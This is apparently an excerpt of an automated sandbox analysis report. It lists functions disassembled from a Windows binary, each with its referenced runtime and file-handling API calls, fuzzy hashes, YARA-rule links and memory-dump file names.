Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 38fbe7127b3237fbde373da92378cdb6c9ffae9de21b77635328a948bd2e489c
Instruction ID: 69d6647c50d6852e17cb3c1cc412007af778c4654d7c7b8257ac1d252cb3ad8d
Opcode Fuzzy Hash: 38fbe7127b3237fbde373da92378cdb6c9ffae9de21b77635328a948bd2e489c
Instruction Fuzzy Hash: 45211C769042099FCB16EF99D941AEEFBF5AF59300F10046EF845AB252C7325E10DB60

Function 003C18FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C18FB

Strings

CMT, xrefs: 003C1974

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 46511761e55c7ca70e8dbb50c995dbdebcf806605e5d4b85fd2cb43d89aed0c9
Instruction ID: 3ec698b66b04b427eb0dee3127e2e131219e225523ca9089943170ced2c294e8
Opcode Fuzzy Hash: 46511761e55c7ca70e8dbb50c995dbdebcf806605e5d4b85fd2cb43d89aed0c9
Instruction Fuzzy Hash: 6F118471A00205EFDB06DF65C4A5EBEF7AABF46300F05405EE849DB242DB359D51EB90

Function 003E7A09 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 003E7A7A

Strings

LCMapStringEx, xrefs: 003E7A1A, 003E7A24

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: be5e5485aaaa32f6ee7b35d072c2ebe4f7ee91f91dd3a63a17e95c313c3abca4
Instruction ID: a7086a524831d47be4d6c5f9df92217256b01ef14650c19bd25e77be1d3bb460
Opcode Fuzzy Hash: be5e5485aaaa32f6ee7b35d072c2ebe4f7ee91f91dd3a63a17e95c313c3abca4
Instruction Fuzzy Hash: D901137250121DBBCF03AF95DC06DEE7F66EF08710F014214FE0825260CA329A31EB90

Function 003E79A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,003E709A), ref: 003E79F2

Strings

InitializeCriticalSectionEx, xrefs: 003E79C2

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: c3a1bb767f5c12111484236a642298f9c1f426895443e9fe3de363cd77a5b772
Instruction ID: 6390bdaa81d5c3729943245121e287226437c3c184ead5144eec0130082a58e8
Opcode Fuzzy Hash: c3a1bb767f5c12111484236a642298f9c1f426895443e9fe3de363cd77a5b772
Instruction Fuzzy Hash: F3F0B47564521CBBCB076F55DC06CBE7FA5DF04710F404254FD185A261DA715E10E7D0

Function 003E784C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 003E788B

Strings

FlsAlloc, xrefs: 003E7867

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: b6e46c7b5c9b42f624d8efc9a0c199a8f631f3ec1aabd921578e6ba73e7ee8df
Instruction ID: f88ea3082356dea5d81f7d3b976774498f2b87e001c787fb87934274f3d81ce2
Opcode Fuzzy Hash: b6e46c7b5c9b42f624d8efc9a0c199a8f631f3ec1aabd921578e6ba73e7ee8df
Instruction Fuzzy Hash: 16E05575B45228BB830BBF69AC0A9BEBB98CF44720F400264FD0466381DD701E00C2C5

Function 003E1D9A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 003E1DAF

Strings

FlsAlloc, xrefs: 003E1D9E, 003E1DA8

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: edc0417d0cba635f2d2aadc8c1c02b5aca351282a6050aaa99670ef1dabf95fe
Instruction ID: 61430c9104d8a73d4e8b6e71f49aecd912cc9fd240cbb511940110342a8ecc30
Opcode Fuzzy Hash: edc0417d0cba635f2d2aadc8c1c02b5aca351282a6050aaa99670ef1dabf95fe
Instruction Fuzzy Hash: 5FD05B36B8227CE6991336D5BC029FA7E588B00BB1F040152FF0865282D5B1445055D1

Function 003DCD5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003DCD6E

Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A

Strings

3uo, xrefs: 003DCD5C, 003DCD68

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3uo
API String ID: 1269201914-2184686533
Opcode ID: 0ab94baead0aaa55a4f62bc099e0741e44cca9946e93920eb30a6b191f863fc1
Instruction ID: 4901388c98b92fae981f71e62f6a6d2106efdee96b3fca001124a64af4694419
Opcode Fuzzy Hash: 0ab94baead0aaa55a4f62bc099e0741e44cca9946e93920eb30a6b191f863fc1
Instruction Fuzzy Hash: E5B092CA2B900ABD252BA2446E02C37010DC080F50321506BF501D8250E8400806C032

Function 003E8618 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 003E81EB: GetOEMCP.KERNEL32(00000000,?,?,003E8474,?), ref: 003E8216

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,003E84B9,?,00000000), ref: 003E868C
GetCPInfo.KERNEL32(00000000,003E84B9,?,?,?,003E84B9,?,00000000), ref: 003E869F

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 47220bed481ed49eed65a612ed7c26ff02c84cc160354daf4117526a7289fc3b
Instruction ID: 712208ec06f299e75062880fe7941b2952155a130b98e5039020e29f9973d35d
Opcode Fuzzy Hash: 47220bed481ed49eed65a612ed7c26ff02c84cc160354daf4117526a7289fc3b
Instruction Fuzzy Hash: 7F515575D006A59EDB238F37C8856BABBE5EF40310F24466ED09E8B2D1DF359942CB90

Function 003D1FA9 Relevance: 3.1, APIs: 2, Instructions: 115COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 003D2112
__CxxThrowException@8.LIBVCRUNTIME ref: 003D2135

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f0b6c252a21f04a24c2b2754d29d49201b5acffd0879fa574071921b8e3dacd
Instruction ID: ef50f159123874cf09fb629f0f74d9ab84f6e96c754417b7bd4b557c7a57cca8
Opcode Fuzzy Hash: 0f0b6c252a21f04a24c2b2754d29d49201b5acffd0879fa574071921b8e3dacd
Instruction Fuzzy Hash: D14106B6609386AFD32ADF34E484BABFBD4BB64304F00061FE65857342D7719858C7A2

Function 003C1383 Relevance: 3.1, APIs: 2, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C1383

Part of subcall function 003C5FB1: __EH_prolog.LIBCMT ref: 003C5FB6

Part of subcall function 003CC413: __EH_prolog.LIBCMT ref: 003CC418
Part of subcall function 003CC413: new.LIBCMT ref: 003CC45B
Part of subcall function 003CC413: new.LIBCMT ref: 003CC47F

new.LIBCMT ref: 003C13FB

Part of subcall function 003CAC66: __EH_prolog.LIBCMT ref: 003CAC6B

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 34b7b6917404389e6bd65908da70850673440082afa8cbc6e615531e566f3556
Instruction ID: eb1daa592f319e5de693018b12e34497ae7c8b0e371f51ad948d77e7f3ae95f1
Opcode Fuzzy Hash: 34b7b6917404389e6bd65908da70850673440082afa8cbc6e615531e566f3556
Instruction Fuzzy Hash: 464115B0805B40DED725DF7A8885AE6FBE5FB19300F50492ED5EEC7282CB326554CB15

Function 003C137E Relevance: 3.1, APIs: 2, Instructions: 94COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003C1383

Part of subcall function 003C5FB1: __EH_prolog.LIBCMT ref: 003C5FB6

Part of subcall function 003CC413: __EH_prolog.LIBCMT ref: 003CC418
Part of subcall function 003CC413: new.LIBCMT ref: 003CC45B
Part of subcall function 003CC413: new.LIBCMT ref: 003CC47F

new.LIBCMT ref: 003C13FB

Part of subcall function 003CAC66: __EH_prolog.LIBCMT ref: 003CAC6B

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8e6f298ba17850a8daa3003240fd26c254ff2ac549342cc3a653317a210ea47b
Instruction ID: 86a8c090db2f30a02570cb2259f91c89d315f0e98a15079019c21051e0ee71f0
Opcode Fuzzy Hash: 8e6f298ba17850a8daa3003240fd26c254ff2ac549342cc3a653317a210ea47b
Instruction Fuzzy Hash: B04124B0805B40DED726DF7A8485AE6FBE5FF29300F504A2ED5EE87282CB726554CB11

Function 003E8457 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 003E631F: GetLastError.KERNEL32(?,003FCBE8,003E2674,003FCBE8,?,?,003E2213,?,?,003FCBE8), ref: 003E6323
Part of subcall function 003E631F: _free.LIBCMT ref: 003E6356
Part of subcall function 003E631F: SetLastError.KERNEL32(00000000,?,003FCBE8), ref: 003E6397
Part of subcall function 003E631F: _abort.LIBCMT ref: 003E639D

Part of subcall function 003E8576: _abort.LIBCMT ref: 003E85A8
Part of subcall function 003E8576: _free.LIBCMT ref: 003E85DC

Part of subcall function 003E81EB: GetOEMCP.KERNEL32(00000000,?,?,003E8474,?), ref: 003E8216

_free.LIBCMT ref: 003E84CF
_free.LIBCMT ref: 003E8505

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 54c3d4e5495114ede50ea49c04ff1e625625cbf021596d124aeb8fb0d305370f
Instruction ID: 62eefb88d2eba670c67acfdc978b1c48c406ae924dd8586508b658e5f9bff861
Opcode Fuzzy Hash: 54c3d4e5495114ede50ea49c04ff1e625625cbf021596d124aeb8fb0d305370f
Instruction Fuzzy Hash: E131C131D046A9AFDB12EB6BC441AAD77E8EF41324F264299F4089B2D2DF315D40CB10

Function 003C94F1 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,003C9B87,?,?,003C7735), ref: 003C9579
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,003C9B87,?,?,003C7735), ref: 003C95AE

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 336d356c58125863669755db2a3e8abe2fe8eac2554b982bb6ab6a646dfda600
Instruction ID: eba748540b62c934628d463062292a530dfe1a18b93d6ed515809827dc83ec09
Opcode Fuzzy Hash: 336d356c58125863669755db2a3e8abe2fe8eac2554b982bb6ab6a646dfda600
Instruction Fuzzy Hash: 9521F0B1000748AFE7328F14C849FA7B7ECEB0A764F01492EF4E5C6591C674AC49CB60

Function 003C9A12 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,003C7436,?,?,?), ref: 003C9A2C
SetFileTime.KERNELBASE(?,?,?,?), ref: 003C9ADC

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: a5bf830c27eb7a24ff88efce3ab6d4d326d94535e9870e5d8a8fd09e1c0fc942
Instruction ID: d18ef8a6e44ba6aaf8f6b8685de47be8999c10b230a03aad16a3cf1a67428aa4
Opcode Fuzzy Hash: a5bf830c27eb7a24ff88efce3ab6d4d326d94535e9870e5d8a8fd09e1c0fc942
Instruction Fuzzy Hash: 5A21D335158385AFC716DE24C889FBABBD8AF96704F06091EF8C1C7181D729ED08C751

Function 003E7735 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 003E7795
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 003E77A2

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: fec8505cc7007034116bae64a69b4f1e319c6e3bd4eb4bedb5ad4af9576741dc
Instruction ID: 585fb6fd891eb7edabc3411b8de73c5aca018a8aa4264388221092187e75c72b
Opcode Fuzzy Hash: fec8505cc7007034116bae64a69b4f1e319c6e3bd4eb4bedb5ad4af9576741dc
Instruction Fuzzy Hash: E3110A376046719B9B23DE2AEC819BA7399AB84720F174320FD15AB2D4D631EC4187D1

Function 003C9AEB Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 003C9B21
GetLastError.KERNEL32 ref: 003C9B2D

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 07a969bbd48ed5fd5ec320d995bec40192bd68c4157afa4f60f87c6872c4607e
Instruction ID: 68093c1b8f6bf3c3e5c5810c7448763534240a06992447afa844424ca70fb7c3
Opcode Fuzzy Hash: 07a969bbd48ed5fd5ec320d995bec40192bd68c4157afa4f60f87c6872c4607e
Instruction Fuzzy Hash: F5018CB07052046BEB3AAA29EC49B6AB6D99B84314F16457FB152C7680CA31DC08C721

Function 003C9897 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 003C98EB
GetLastError.KERNEL32 ref: 003C98F8

Part of subcall function 003C96AA: __EH_prolog.LIBCMT ref: 003C96AF

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
